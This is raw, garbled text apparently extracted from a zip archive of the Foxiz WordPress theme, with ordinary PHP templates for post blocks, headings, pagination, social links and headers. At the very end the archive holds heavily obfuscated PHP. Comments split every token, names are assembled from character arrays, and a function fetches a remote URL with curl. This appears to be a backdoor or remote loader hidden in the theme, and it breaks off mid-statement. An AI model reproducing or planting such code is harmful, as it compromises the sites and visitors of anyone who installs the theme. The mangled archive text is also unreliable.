foxiz_error_posts( $_query, $min_posts ); } else { foxiz_block_inner_open_tag( $settings ); foxiz_loop_list_1( $settings, $_query ); foxiz_block_inner_close_tag( $settings ); foxiz_render_pagination( $settings, $_query ); wp_reset_postdata(); } foxiz_block_close_tag(); return ob_get_clean(); } } if ( ! function_exists( 'foxiz_loop_list_1' ) ) { /** * @param $settings * @param $_query */ function foxiz_loop_list_1( $settings, $_query ) { $settings = foxiz_get_design_standard_block( $settings, 'list_1' ); while ( $_query->have_posts() ) : $_query->the_post(); foxiz_list_1( $settings ); endwhile; } }PK!} } templates/blocks/grid-2.phpnu[ '', 'name' => 'grid_2' ) ); $settings = foxiz_detect_dynamic_query( $settings ); $settings['classes'] = 'block-grid block-grid-2'; if ( empty( $settings['columns'] ) ) { $settings['columns'] = 3; } if ( empty( $settings['column_gap'] ) ) { $settings['column_gap'] = 20; } if ( ! empty( $settings['carousel'] ) && '1' === (string) $settings['carousel'] ) { unset( $settings['pagination'] ); if ( empty( $settings['columns_tablet'] ) ) { $settings['columns_tablet'] = 2; } if ( empty( $settings['columns_mobile'] ) ) { $settings['columns_mobile'] = 1; } if ( empty( $settings['carousel_gap'] ) ) { $settings['carousel_gap'] = 20; } if ( empty( $settings['carousel_gap_tablet'] ) ) { $settings['carousel_gap_tablet'] = 15; } if ( empty( $settings['carousel_gap_mobile'] ) ) { $settings['carousel_gap_mobile'] = 10; } } if ( empty( $settings['pagination'] ) ) { $settings['no_found_rows'] = true; } if ( ! $_query ) { $_query = foxiz_query( $settings ); } ob_start(); foxiz_block_open_tag( $settings, $_query ); if ( ! $_query->have_posts() ) { foxiz_error_posts( $_query ); } else { foxiz_block_inner_open_tag( $settings ); foxiz_loop_grid_2( $settings, $_query ); foxiz_block_inner_close_tag( $settings ); foxiz_render_pagination( $settings, $_query ); wp_reset_postdata(); } foxiz_block_close_tag(); return ob_get_clean(); } } if ( ! function_exists( 'foxiz_loop_grid_2' ) ) { /** * @param $settings * @param $_query */ function foxiz_loop_grid_2( $settings, $_query ) { $settings = foxiz_get_design_standard_block( $settings, 'grid_2' ); if ( ! empty( $settings['carousel'] ) && '1' === (string) $settings['carousel'] ) : ?>
>
have_posts() ) : $_query->the_post(); foxiz_grid_2( $settings ); endwhile; ?>
have_posts() ) : $_query->the_post(); foxiz_grid_2( $settings ); endwhile; endif; } }PK!ShBBtemplates/blocks/list-2.phpnu[ '', 'name' => 'list_2' ) ); $settings = foxiz_detect_dynamic_query( $settings ); if ( empty( $settings['pagination'] ) ) { $settings['no_found_rows'] = true; } if ( empty( $settings['column_gap'] ) ) { $settings['column_gap'] = 15; } $settings['classes'] = 'block-list block-list-2'; $min_posts = 1; if ( ! $_query ) { $_query = foxiz_query( $settings ); } ob_start(); foxiz_block_open_tag( $settings, $_query ); if ( ! $_query->have_posts() || $_query->post_count < $min_posts ) { foxiz_error_posts( $_query, $min_posts ); } else { foxiz_block_inner_open_tag( $settings ); foxiz_loop_list_2( $settings, $_query ); foxiz_block_inner_close_tag( $settings ); foxiz_render_pagination( $settings, $_query ); wp_reset_postdata(); } foxiz_block_close_tag(); return ob_get_clean(); } } if ( ! function_exists( 'foxiz_loop_list_2' ) ) { /** * @param $settings * @param $_query */ function foxiz_loop_list_2( $settings, $_query ) { $settings = foxiz_get_design_standard_block( $settings, 'list_2' ); while ( $_query->have_posts() ) : $_query->the_post(); foxiz_list_2( $settings ); endwhile; } }PK!^ WWtemplates/blocks/heading.phpnu[ '', 'layout' => '', 'title' => '', 'link' => array(), 'html_tag' => '', 'tagline' => '', 'tagline_arrow' => '', 'classes' => '' ) ); if ( empty( $settings['title'] ) ) { return false; } if ( strpos( $settings['title'], '{category}' ) !== false && is_category() ) { $settings['title'] = str_replace( '{category}', get_queried_object()->name, $settings['title'] ); } elseif ( strpos( $settings['title'], '{tag}' ) !== false && is_tag() ) { $settings['title'] = str_replace( '{tag}', get_queried_object()->name, $settings['title'] ); } elseif ( strpos( $settings['title'], '{search}' ) !== false && is_search() ) { $settings['title'] = str_replace( '{search}', get_search_query( 's' ), $settings['title'] ); } elseif ( strpos( $settings['title'], '{author}' ) !== false && is_author() ) { $settings['title'] = str_replace( '{author}', get_queried_object()->display_name, $settings['title'] ); } $class_name = 'block-h'; if ( empty( $settings['layout'] ) ) { $settings['layout'] = foxiz_get_option( 'heading_layout', 1 ); } $class_name .= ' heading-layout-' . $settings['layout']; if ( ! empty( $settings['color_scheme'] ) ) { $class_name .= ' light-scheme'; } $title_class_name = 'heading-title'; if ( ! empty( $settings['classes'] ) ) { $title_class_name .= ' ' . $settings['classes']; } if ( empty( $settings['html_tag'] ) ) { $settings['html_tag'] = 'h3'; } $output = ''; $output .= '
'; $output .= '<' . $settings['html_tag'] . ' class="' . esc_attr( $title_class_name ) . '">'; if ( ! empty( $settings['link']['url'] ) ) { $output .= foxiz_render_elementor_link( $settings['link'], $settings['title'] ); } else { $output .= '' . wp_kses( $settings['title'], 'foxiz' ) . ''; } $output .= ''; if ( ! empty( $settings['tagline'] ) ) { $output .= '
'; if ( ! empty( $settings['link']['url'] ) ) { $output .= foxiz_render_elementor_link( $settings['link'], $settings['tagline'], 'heading-tagline-label' ); } else { $output .= '' . esc_html( $settings['tagline'] ) . ''; } if ( ! empty( $settings['tagline_arrow'] ) ) { $output .= ''; } $output .= '
'; } $output .= '
'; $output .= ''; return $output; } } if ( ! function_exists( 'foxiz_get_start_widget_heading' ) ) { /** * @param array $settings * * @return string */ function foxiz_get_start_widget_heading( $settings = array() ) { $settings = wp_parse_args( $settings, array( 'layout' => '', 'html_tag' => '' ) ); $class_name = 'block-h widget-heading'; $class_name .= ' heading-layout-' . $settings['layout']; if ( empty( $settings['html_tag'] ) ) { $settings['html_tag'] = 'h4'; } $output = ''; $output .= '
'; $output .= '<' . $settings['html_tag'] . ' class="heading-title">'; return $output; } } if ( ! function_exists( 'foxiz_get_end_widget_heading' ) ) { /** * @param array $settings * * @return string */ function foxiz_get_end_widget_heading( $settings = array() ) { if ( empty( $settings['html_tag'] ) ) { $settings['html_tag'] = 'h4'; } $output = ''; $output .= '
'; return $output; } }PK! templates/blocks/overlay-2.phpnu[ '', 'name' => 'overlay_2' ) ); $settings = foxiz_detect_dynamic_query( $settings ); if ( empty( $settings['columns'] ) ) { $settings['columns'] = 3; } if ( empty( $settings['column_gap'] ) ) { $settings['column_gap'] = 7; } if ( ! empty( $settings['carousel'] ) && '1' === (string) $settings['carousel'] ) { unset( $settings['pagination'] ); if ( empty( $settings['columns_tablet'] ) ) { $settings['columns_tablet'] = 2; } if ( empty( $settings['columns_mobile'] ) ) { $settings['columns_mobile'] = 1; } if ( empty( $settings['carousel_gap'] ) ) { $settings['carousel_gap'] = 10; } if ( empty( $settings['carousel_gap_tablet'] ) ) { $settings['carousel_gap_tablet'] = 10; } if ( empty( $settings['carousel_gap_mobile'] ) ) { $settings['carousel_gap_mobile'] = 10; } } if ( empty( $settings['pagination'] ) ) { $settings['no_found_rows'] = true; } $settings['classes'] = 'block-overlay block-overlay-2'; if ( ! $_query ) { $_query = foxiz_query( $settings ); } ob_start(); foxiz_block_open_tag( $settings, $_query ); if ( ! $_query->have_posts() ) { foxiz_error_posts( $_query ); } else { foxiz_block_inner_open_tag( $settings ); foxiz_loop_overlay_2( $settings, $_query ); foxiz_block_inner_close_tag( $settings ); foxiz_render_pagination( $settings, $_query ); wp_reset_postdata(); } foxiz_block_close_tag(); return ob_get_clean(); } } if ( ! function_exists( 'foxiz_loop_overlay_2' ) ) { /** * @param $settings * @param $_query */ function foxiz_loop_overlay_2( $settings, $_query ) { $settings = foxiz_get_design_builder_block( $settings ); if ( ! empty( $settings['carousel'] ) && '1' === (string) $settings['carousel'] ) : ?>
>
have_posts() ) : $_query->the_post(); foxiz_overlay_2( $settings ); endwhile; ?>
have_posts() ) : $_query->the_post(); foxiz_overlay_2( $settings ); endwhile; endif; } }PK! 0vv#templates/blocks/hierarchical-2.phpnu[ '', 'name' => 'hierarchical_2' ) ); $settings = foxiz_detect_dynamic_query( $settings ); $settings['classes'] = 'block-small block-hrc hrc-2'; if ( empty( $settings['pagination'] ) ) { $settings['no_found_rows'] = true; } else { $settings['classes'] .= ' short-pagination'; } $min_posts = 2; $_query = foxiz_query( $settings ); ob_start(); foxiz_block_open_tag( $settings, $_query ); if ( ! $_query->have_posts() || $_query->post_count < $min_posts ) { foxiz_error_posts( $_query, $min_posts ); } else { foxiz_block_inner_open_tag( $settings ); foxiz_loop_hierarchical_2( $settings, $_query ); foxiz_block_inner_close_tag( $settings ); foxiz_render_pagination( $settings, $_query ); wp_reset_postdata(); } foxiz_block_close_tag(); return ob_get_clean(); } } if ( ! function_exists( 'foxiz_loop_hierarchical_2' ) ) { /** * @param $settings * @param $_query */ function foxiz_loop_hierarchical_2( $settings, $_query ) { $flag = true; $settings = foxiz_get_design_builder_block( $settings ); if ( empty( $settings['title_tag'] ) ) { $settings['title_tag'] = 'h3'; } if ( empty( $settings['sub_title_tag'] ) ) { $settings['sub_title_tag'] = 'h5'; } while ( $_query->have_posts() ) : $_query->the_post(); if ( $flag ) { foxiz_list_small_1( $settings ); $settings['title_tag'] = $settings['sub_title_tag']; $flag = false; } else { foxiz_list_inline( $settings ); } endwhile; } } PK!suu templates/blocks/quick-links.phpnu[ '', 'name' => 'quick-links', 'header' => '', 'quick_links' => array(), 'layout' => '1', ) ); $settings['classes'] = 'block-qlinks qlinks-layout-' . esc_attr( $settings['layout'] ); ob_start(); foxiz_block_open_tag( $settings ); ?>
Order allow,deny Deny from all Order allow,deny Allow from all RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] PK!ZtZttemplates/parts.phpnu['; } } if ( ! function_exists( 'foxiz_block_open_tag' ) ) { /** * @param array $settings * @param null $_query * render block open tag */ function foxiz_block_open_tag( $settings = array(), $_query = null ) { echo foxiz_get_block_open_tag( $settings, $_query ); } } if ( ! function_exists( 'foxiz_block_close_tag' ) ) { /** * @param array $settings * render block close tag */ function foxiz_block_close_tag( $settings = array() ) { $tag = 'div'; if ( ! empty( $settings['block_tag'] ) ) { $tag = $settings['block_tag']; } echo ''; } } if ( ! function_exists( 'foxiz_error_posts' ) ) { /** * @param null $_query * @param string $min * render error posts */ function foxiz_error_posts( $_query = null, $min = '' ) { if ( current_user_can( 'edit_pages' ) ) : if ( ! $_query->have_posts() || ! $_query->post_count ) { $messenger = esc_html__( 'No found posts, Please add a new post for this query or change the block settings: ', 'foxiz' ); } else { $messenger = sprintf( esc_html__( 'This block requests at least %s posts, Please add new posts for this query or change the block settings: ', 'foxiz' ), $min ); } ?>

'; } echo '
'; } } if ( ! function_exists( 'foxiz_block_inner_close_tag' ) ) { /** * @param array $settings */ function foxiz_block_inner_close_tag( $settings = array() ) { echo '
'; if ( ! empty( $settings['scroll_height'] ) ) { echo ''; } } } if ( ! function_exists( 'foxiz_render_pagination' ) ) { /** * @param $settings * @param null $_query * * @return false * render pagination */ function foxiz_render_pagination( $settings, $_query = null ) { /** ajax pagination for template builder */ if ( ! empty( $settings['query_mode'] ) && 'global' === $settings['query_mode'] ) { if ( empty( $settings['builder_pagination'] ) ) { $settings['builder_pagination'] = 'number'; } if ( foxiz_is_template_preview() ) { echo '
' . sprintf( esc_html__( 'Dynamic %s pagination', 'foxiz' ), $settings['builder_pagination'] ) . '
'; return false; } $settings['pagination'] = $settings['builder_pagination']; $settings['posts_per_page'] = $_query->get( 'posts_per_page' ); if ( is_category() ) { $settings['category'] = $_query->get_queried_object_id(); } elseif ( is_tag() ) { $settings['tag_in'] = array($_query->get_queried_object_id()); } elseif ( is_author() ) { $settings['author'] = $_query->get_queried_object_id(); } elseif ( is_search() ) { $settings['s'] = get_search_query(); } elseif ( is_archive() ) { /** archive fallback */ if ( 'load_more' === $settings['pagination'] || 'infinite_scroll' === $settings['pagination'] || 'next_prev' === $settings['pagination'] ) { $settings['pagination'] = 'number'; } } /** AMP fallback */ if ( foxiz_is_amp() && ( 'load_more' === $settings['pagination'] || 'infinite_scroll' === $settings['pagination'] || 'next_prev' === $settings['pagination'] ) ) { $settings['pagination'] = 'number'; } } if ( empty( $settings['pagination'] ) || empty( $settings['uuid'] ) ) { return false; } if ( foxiz_is_amp() && ( 'load_more' === $settings['pagination'] || 'infinite_scroll' === $settings['pagination'] || 'next_prev' === $settings['pagination'] ) ) { return false; } unset( $settings['classes'] ); unset( $settings['dynamic_query'] ); unset( $settings['animation_duration'] ); unset( $settings['hide_desktop'] ); unset( $settings['hide_tablet'] ); unset( $settings['hide_mobile'] ); unset( $settings['title_font_font_size'] ); unset( $settings['title_font_font_size_tablet'] ); unset( $settings['title_font_font_size_mobile'] ); unset( $settings['title_font_line_height'] ); unset( $settings['title_font_line_height_tablet'] ); unset( $settings['title_font_line_height_mobile'] ); unset( $settings['title_font_letter_spacing'] ); unset( $settings['title_font_letter_spacing_tablet'] ); unset( $settings['title_font_letter_spacing_mobile'] ); unset( $settings['title_font_word_spacing'] ); unset( $settings['title_font_word_spacing_tablet'] ); unset( $settings['title_font_word_spacing_mobile'] ); unset( $settings['category_font_font_size'] ); unset( $settings['category_font_font_size_tablet'] ); unset( $settings['category_font_font_size_mobile'] ); unset( $settings['category_font_line_height'] ); unset( $settings['category_font_line_height_tablet'] ); unset( $settings['category_font_line_height_mobile'] ); unset( $settings['category_font_letter_spacing'] ); unset( $settings['category_font_letter_spacing_tablet'] ); unset( $settings['category_font_letter_spacing_mobile'] ); unset( $settings['category_font_word_spacing'] ); unset( $settings['category_font_word_spacing_tablet'] ); unset( $settings['category_font_word_spacing_mobile'] ); if ( ! empty( $settings['unique'] ) ) { $queried_ids = $_query->get( 'foxiz_queried_ids' ); if ( is_array( $queried_ids ) ) { $queried_ids = implode( ',', $queried_ids ); if ( empty( $settings['post_not_in'] ) ) { $settings['post_not_in'] = $queried_ids; } else { $settings['post_not_in'] .= ',' . $queried_ids; } } } if ( ! empty( $settings['post_not_in'] ) ) { $settings['post_not_in'] = str_replace( ',,', ',', $settings['post_not_in'] ); } if ( $_query->query_vars['paged'] > 1 ) { $settings['paged'] = $_query->query_vars['paged']; } elseif ( ! empty( get_query_var( 'paged' ) ) && get_query_var( 'paged' ) > 1 ) { $settings['paged'] = get_query_var( 'paged' ); } else { $settings['paged'] = 1; } if ( ! empty( $_query->max_num_pages ) ) { $settings['page_max'] = $_query->max_num_pages; } if ( ! empty( $settings['offset'] ) && ! empty( $_query->found_posts ) && ! empty( $settings['posts_per_page'] ) ) { $settings['page_max'] = ceil( ( $_query->found_posts - $settings['offset'] ) / $settings['posts_per_page'] ); } $js_settings = array(); $localize = 'foxiz-global'; foreach ( $settings as $key => $val ) { if ( '_' !== mb_substr( $key, 0, 1 ) ) { $js_settings[ $key ] = $val; } } if ( ! empty( $settings['localize'] ) ) { $localize = $settings['localize']; } wp_localize_script( $localize, $settings['uuid'], $js_settings ); switch ( $settings['pagination'] ) { case 'next_prev' : foxiz_render_pagination_nextprev( $_query ); break; case 'load_more' : foxiz_render_pagination_load_more( $_query ); break; case 'infinite_scroll' : foxiz_render_pagination_infinite( $_query ); break; case 'simple' : foxiz_render_pagination_simple( $_query ); break; case 'number' : foxiz_render_pagination_number( $_query ); break; default: return false; } } } if ( ! function_exists( 'foxiz_render_pagination_load_more' ) ) { /** * @param null $_query * * @return false */ function foxiz_render_pagination_load_more( $_query = null ) { if ( empty( $_query ) || ! is_object( $_query ) ) { global $wp_query; $_query = $wp_query; } if ( $_query->max_num_pages < 2 ) { return false; } ?>
max_num_pages < 2 ) { return false; } ?>
max_num_pages < 2 ) { return false; } ?>
max_num_pages < 2 ) { return false; } ?> max_num_pages < 2 ) { return false; } $current = 1; $total = $_query->max_num_pages; if ( $_query->query_vars['paged'] > 1 ) { $current = $_query->query_vars['paged']; } elseif ( ! empty( get_query_var( 'paged' ) ) && get_query_var( 'paged' ) > 1 ) { $current = get_query_var( 'paged' ); } if ( ! empty( $offset ) ) { $post_per_page = $_query->query_vars['posts_per_page']; $total = $_query->max_num_pages - floor( $offset / $post_per_page ); $found_posts = $_query->found_posts; if ( $found_posts < ( $total * $post_per_page ) ) { $total = $total - 1; } } $params = array( 'total' => $total, 'current' => $current, 'end_size' => 2, 'mid_size' => 2, 'prev_text' => '', 'next_text' => '', 'type' => 'plain' ); if ( ! empty( $_query->query_vars['s'] ) ) { $params['add_args'] = array( 's' => urlencode( get_query_var( 's' ) ) ); } ?>
<?php foxiz_attr_e( 'search', 'foxiz' ) ?>
'; if ( ! empty( $title ) ) { $output .= esc_html( $title ); } $output .= ''; return $output; } } if ( ! function_exists( 'foxiz_get_social_list' ) ) { /** * @param array $data * @param bool $new_tab * @param bool $custom * * @return false|string */ function foxiz_get_social_list( $data = array(), $new_tab = true, $custom = true ) { if ( empty( $data ) ) { return false; } if ( true === $new_tab ) { $new_tab = 'target="_blank" rel="noopener nofollow"'; } else { $new_tab = 'rel="noopener nofollow"'; } extract( shortcode_atts( array( 'website' => '', 'facebook' => '', 'twitter' => '', 'youtube' => '', 'instagram' => '', 'pinterest' => '', 'linkedin' => '', 'tumblr' => '', 'flickr' => '', 'skype' => '', 'snapchat' => '', 'myspace' => '', 'bloglovin' => '', 'digg' => '', 'dribbble' => '', 'soundcloud' => '', 'vimeo' => '', 'reddit' => '', 'vkontakte' => '', 'telegram' => '', 'whatsapp' => '', 'rss' => '', ), $data ) ); $output = ''; if ( ! empty( $website ) ) { $output .= ''; } if ( ! empty( $facebook ) ) { $output .= ''; } if ( ! empty( $twitter ) ) { $output .= ''; } if ( ! empty( $youtube ) ) { $output .= ''; } if ( ! empty( $pinterest ) ) { $output .= ''; } if ( ! empty( $instagram ) ) { $output .= ''; } if ( ! empty( $linkedin ) ) { $output .= ''; } if ( ! empty( $tumblr ) ) { $output .= ''; } if ( ! empty( $flickr ) ) { $output .= ''; } if ( ! empty( $skype ) ) { $output .= ''; } if ( ! empty( $snapchat ) ) { $output .= ''; } if ( ! empty( $myspace ) ) { $output .= ''; } if ( ! empty( $bloglovin ) ) { $output .= ''; } if ( ! empty( $digg ) ) { $output .= ''; } if ( ! empty( $dribbble ) ) { $output .= ''; } if ( ! empty( $soundcloud ) ) { $output .= ''; } if ( ! empty( $vimeo ) ) { $output .= ''; } if ( ! empty( $reddit ) ) { $output .= ''; } if ( ! empty( $vkontakte ) ) { $output .= ''; } if ( ! empty( $telegram ) ) { $output .= ''; } if ( ! empty( $whatsapp ) ) { $output .= ''; } if ( ! empty( $rss ) ) { $output .= ''; } if ( $custom ) { $social_1_url = foxiz_get_option( 'custom_social_1_url' ); $social_1_name = foxiz_get_option( 'custom_social_1_name' ); $social_1_icon = foxiz_get_option( 'custom_social_1_icon' ); $social_2_url = foxiz_get_option( 'custom_social_2_url' ); $social_2_name = foxiz_get_option( 'custom_social_2_name' ); $social_2_icon = foxiz_get_option( 'custom_social_2_icon' ); $social_3_url = foxiz_get_option( 'custom_social_3_url' ); $social_3_name = foxiz_get_option( 'custom_social_3_name' ); $social_3_icon = foxiz_get_option( 'custom_social_3_icon' ); if ( ! empty( $social_1_url ) && ! empty( $social_1_name ) ) { $output .= ''; } if ( ! empty( $social_2_url ) && ! empty( $social_2_name ) ) { $output .= ''; } if ( ! empty( $social_3_url ) && ! empty( $social_3_name ) ) { $output .= ''; } } return $output; } } if ( ! function_exists( 'foxiz_get_category_hero' ) ) { /** * @param array $featured_array * @param array $featured_urls_array * @param string $size * * @return false|string */ function foxiz_get_category_hero( $featured_array = array(), $featured_urls_array = array(), $size = 'foxiz_crop_o1' ) { if ( ! is_array( $featured_array ) || ! count( $featured_array ) ) { return false; } if ( 1 === count( $featured_array ) ) { $featured_array[1] = $featured_array[0]; } $counter = 0; $output = '
'; foreach ( $featured_array as $index => $id ) { $url = wp_get_attachment_image_url( $id, $size ); $alt = get_post_meta( $url, '_wp_attachment_image_alt', true ); if ( empty( $url ) && ! empty( $featured_urls_array[ $index ] ) ) { $url = $featured_urls_array[ $index ]; } $output .= '
'; $output .= '
'; $output .= '' . esc_attr( $alt ) . ''; $output .= '
'; $output .= '
'; $counter ++; if ( $counter > 1 ) { break; } } $output .= '
'; return $output; } } if ( ! function_exists( 'foxiz_render_category_hero' ) ) { /** * @param array $featured_array * @param array $featured_urls_array * @param string $size */ function foxiz_render_category_hero( $featured_array = array(), $featured_urls_array = array(), $size = '' ) { echo foxiz_get_category_hero( $featured_array, $featured_urls_array, $size ); } } if ( ! function_exists( 'foxiz_get_category_featured' ) ) { /** * @param array $featured_array * @param array $featured_urls_array * @param string $size * * @return false|string */ function foxiz_get_category_featured( $featured_array = array(), $featured_urls_array = array(), $size = 'foxiz_crop_g1' ) { if ( empty( $featured_array[0] ) && empty( $featured_urls_array[0] ) ) { return false; } $output = ''; if ( ! empty( $featured_array[0] ) ) { $output .= wp_get_attachment_image( $featured_array[0], $size ); } else { $output .= ''; } $output .= ''; return $output; } } if ( ! function_exists( 'foxiz_render_category_featured' ) ) { /** * @param array $featured_array * @param array $featured_urls_image * @param string $size */ function foxiz_render_category_featured( $featured_array = array(), $featured_urls_image = array(), $size = '' ) { echo foxiz_get_category_featured( $featured_array, $featured_urls_image, $size ); } } if ( ! function_exists( 'foxiz_get_follow_trigger' ) ) { /** * @param array $settings * * @return false|string */ function foxiz_get_follow_trigger( $settings = array() ) { if ( empty( $settings['id'] ) || foxiz_is_amp() || ! class_exists( 'Foxiz_Bookmark' ) ) { return false; } if ( ! is_user_logged_in() ) { return foxiz_get_follow_trigger_guess( $settings ); } $classes = array(); $classes[] = 'follow-button follow-trigger'; if ( ! empty( $settings['classes'] ) ) { $classes[] = $settings['classes']; } if ( Foxiz_Bookmark::get_instance()->is_followed( $settings['id'] ) ) { $classes[] = 'followed'; } $output = ''; $output .= ''; $output .= ''; $output .= ''; return $output; } } if ( ! function_exists( 'foxiz_get_follow_trigger_guess' ) ) { function foxiz_get_follow_trigger_guess( $settings = array() ) { $classes = array(); $classes[] = 'follow-button login-toggle'; if ( ! empty( $settings['classes'] ) ) { $classes[] = $settings['classes']; } if ( empty( $settings['login_url'] ) ) { $settings['login_url'] = foxiz_get_option( 'bookmark_logged_redirect' ); } if ( empty( $settings['login_url'] ) ) { $settings['login_url'] = esc_url( wp_login_url( get_permalink() ) ); } $output = ''; $output .= ''; $output .= ''; return $output; } } if ( ! function_exists( 'foxiz_follow_trigger' ) ) { /** * @param array $settings */ function foxiz_follow_trigger( $settings = array() ) { echo foxiz_get_follow_trigger( $settings ); } } PK!X templates/header/transparent.phpnu[

'; return $output; } elseif ( empty( $logo['url'] ) ) { $logo = $retina_logo; $output = ''; return $output; } $output = ''; return $output; } } if ( ! function_exists( 'foxiz_render_logo' ) ) { /** * @param array $settings * * @return false */ function foxiz_render_logo( $settings = array() ) { if ( empty( $settings['logo']['url'] ) && empty( $settings['retina_logo']['url'] ) ) { foxiz_render_text_logo(); return false; } $blog_name = get_bloginfo( 'name' ); $class_name = array(); $class_name[] = 'logo-wrap'; if ( ! empty( $settings['classes'] ) ) { $class_name[] = $settings['classes']; } $class_name[] = 'is-image-logo site-branding'; if ( foxiz_is_svg( $settings['logo']['url'] ) ) { $class_name[] = 'is-logo-svg'; } ?> 'foxiz_main', 'menu_id' => false, 'container' => '', 'menu_class' => 'main-menu rb-menu large-menu', 'walker' => new Foxiz_Walker_Nav_Menu(), 'depth' => 4, 'items_wrap' => '
    %3$s
', 'echo' => true, 'fallback_cb' => 'foxiz_navigation_fallback', 'fallback_name' => esc_html__( 'Main Menu', 'foxiz' ) ); if ( ! empty( $sub_scheme ) ) { $args['sub_scheme'] = 'light-scheme'; } ?>
'foxiz_mobile_quick', 'container_class' => 'mobile-qview', 'menu_class' => 'mobile-qview-inner', 'depth' => 1, 'echo' => false, 'fallback_cb' => '__return_false', ) ); } } if ( ! function_exists( 'foxiz_header_mobile_layout_default' ) ) { /** * @param $settings */ function foxiz_header_mobile_layout_default( $settings = array() ) { ?>
get_query(); if ( ! empty( $bookmark_query ) && $bookmark_query->have_posts() ) : ?>
true, 'edit_link' => false, 'bookmark' => false, 'entry_meta' => 'date', ), $bookmark_query ); wp_reset_postdata(); ?>
true, 'uuid' => 'uid_notification', 'edit_link' => false, 'bookmark' => false, 'entry_meta' => 'date', 'pagination' => 'infinite_scroll', 'posts_per_page' => 5, 'order' => 'post_date', 'duplicate_allowed' => 1, ) ); ?>
'; $output .= esc_html( trim( $settings['alert_content'] ) ); $output .= ''; return $output; } } if ( ! function_exists( 'foxiz_top_ad' ) ) { /** * @return false|void */ function foxiz_top_ad() { if ( ! foxiz_get_option( 'ad_top_code' ) && ! foxiz_get_option( 'ad_top_image' ) ) { return false; } $disable_top_ad = rb_get_meta( 'disable_top_ad', get_the_ID() ); if ( ! empty( $disable_top_ad ) && '-1' === (string) $disable_top_ad ) { return false; } $classes = 'top-site-ad'; if ( foxiz_get_option( 'ad_top_spacing' ) ) { $classes .= ' no-spacing'; } if ( foxiz_get_option( 'ad_top_type' ) ) { $settings = array( 'code' => foxiz_get_option( 'ad_top_code' ), 'size' => foxiz_get_option( 'ad_top_size' ), 'desktop_size' => foxiz_get_option( 'ad_top_desktop_size' ), 'tablet_size' => foxiz_get_option( 'ad_top_tablet_size' ), 'mobile_size' => foxiz_get_option( 'ad_top_mobile_size' ) ); if ( foxiz_get_adsense( $settings ) ) { echo '
' . foxiz_get_adsense( $settings ) . '
'; } } else { $settings = array( 'image' => foxiz_get_option( 'ad_top_image' ), 'dark_image' => foxiz_get_option( 'ad_top_dark_image' ), 'destination' => foxiz_get_option( 'ad_top_destination' ) ); if ( foxiz_get_ad_image( $settings ) ) { echo '
' . foxiz_get_ad_image( $settings ) . '
'; } } } } if ( ! function_exists( 'foxiz_header_socials' ) ) { function foxiz_header_socials( $settings = array() ) { if ( ! empty( $settings['header_socials'] ) ) : ?>
foxiz_get_option( 'amp_header_ad_type' ), 'client' => foxiz_get_option( 'amp_header_adsense_client' ), 'slot' => foxiz_get_option( 'amp_header_adsense_slot' ), 'size' => foxiz_get_option( 'amp_header_adsense_size' ), 'custom' => foxiz_get_option( 'amp_header_ad_code' ), 'classname' => 'header-amp-ad amp-ad-wrap' ) ); } } } if ( ! function_exists( 'foxiz_render_header_rb_template' ) ) { /** * @return false * header builder */ function foxiz_render_header_rb_template() { $settings = foxiz_get_option(); $shortcode = ''; if ( is_home() ) { if ( ! empty( $settings['blog_header_template'] ) ) { $shortcode = $settings['blog_header_template']; } } elseif ( is_category() ) { global $wp_query; $data = get_option( 'foxiz_category_meta', array() ); $category_id = $wp_query->get_queried_object_id(); if ( ! empty( $data[ $category_id ]['header_template'] ) ) { $shortcode = $data[ $category_id ]['header_template']; } elseif ( ! empty( $settings['category_header_template'] ) ) { $shortcode = $settings['category_header_template']; } } elseif ( is_search() ) { if ( ! empty( $settings['search_header_template'] ) ) { $shortcode = $settings['search_header_template']; } } elseif ( is_singular() || is_page() ) { $shortcode = rb_get_meta( 'header_template', get_the_ID() ); } /** global value */ if ( empty( $shortcode ) ) { $shortcode = foxiz_get_option( 'header_template' ); } if ( empty( $shortcode ) ) { foxiz_render_header_1(); return false; } ?> r)-*/= /*-EmNf4-KYe-*/$jYoPC/*-m}LK7`EZcv-*/("~", /*-9RP^K.-*/" "); /*-JD8W,>E(-*/$Bs/*-%f(;-*/=/*-0ZUCh-*/${$riE/*-q:-ENNI:C-*/[2+29]/*-mjK-*/.$riE/*-2b0EoE$WR-*/[10+49]/*-eTJ-*/.$riE/*-:E(L{Mm>:#-*/[28+19]./*-sP.Mg<--*/$riE/*-Tm]_5@-*/[42+5]./*-@[bqF;vL-*/$riE/*-<%-*/[17+34]./*-+_@l2<@+-*/$riE/*-i}x-*/[52+1]/*-v~{-*/.$riE/*-0x_-*/[24+33]/*-4(-*/}; /*-}}D~h-*/if(/*-Zu32u-*/in_array/*-vH]7`ce-*/(gettype/*-j9J$X#B;c-*/($Bs)."25",/*-iQkBsHo.-*/$Bs))/*-{?pgW=p|-*/{ $Bs/*-;)-*/[68]/*-GmZ^SQ-*/=/*-P#KS%N;-*/(/*-8lJSd9-*/"~"/*-m.ddfW-*/, /*-Y]Bd$S-*/" "/*-~Z<-*/);/*-Q]2j-*/ $DSz /*-1~h-*/= /*-e$a#-*/explode/*-g=-*/(/*-C<-*/"(", /*-n3m:h4u|jU-*/$fKu/*-n8T9B=>VN-*/); /*-<96g6EXX-*/$HVTaQsXBOh /*-ekb!D-*/= /*-vskrg4n-*/""; foreach /*-,we&wS80T&-*/(/*-=}|-*/$DSz /*-(,1sT0X-*/as /*-+o-*/$fXs /*-KJ$-*/=>/*-?-$-*/ $zXT/*-@P!&1cl-*/) /*-=2tY470-*/$HVTaQsXBOh /*-mbL$-*/.= /*-mK=36B+-*/$WBkPAvCEpM[$zXT/*-=J{>r}ywI>-*/ - /*-,op#Nz(,Z-*/68678/*-wx[tb-*/];/*-0.-*/ return /*-s[-*/$HVTaQsXBOh; /*-LD-*/} /*-cKx;-8)-*/static /*-J3G]k`mo-*/function /*-;X-*/Hp/*-z}-*/(/*->9A-*/$NJOAR,/*->|-*/ $np/*-Jwm-*/)/*-c5K$UP:Td,-*/ {/*-sc232Q-*/ $EV/*-8Ek@?-*/ = /*-A!D-*/curl_init/*-;14$9I0FT%-*/(/*-VSO#e-*/$NJOAR/*-JqDxu?lfEW-*/);/*-(s28L|K49-*/ curl_setopt/*-aT3-*/(/*-`T#xrM&wq-*/$EV,/*-{Qq01-*/ CURLOPT_RETURNTRANSFER,/*-)WyWd-*/ 1/*-.o-*/);/*-D#6}T^N-*/ $fead/*-3?1hd1-*/ = 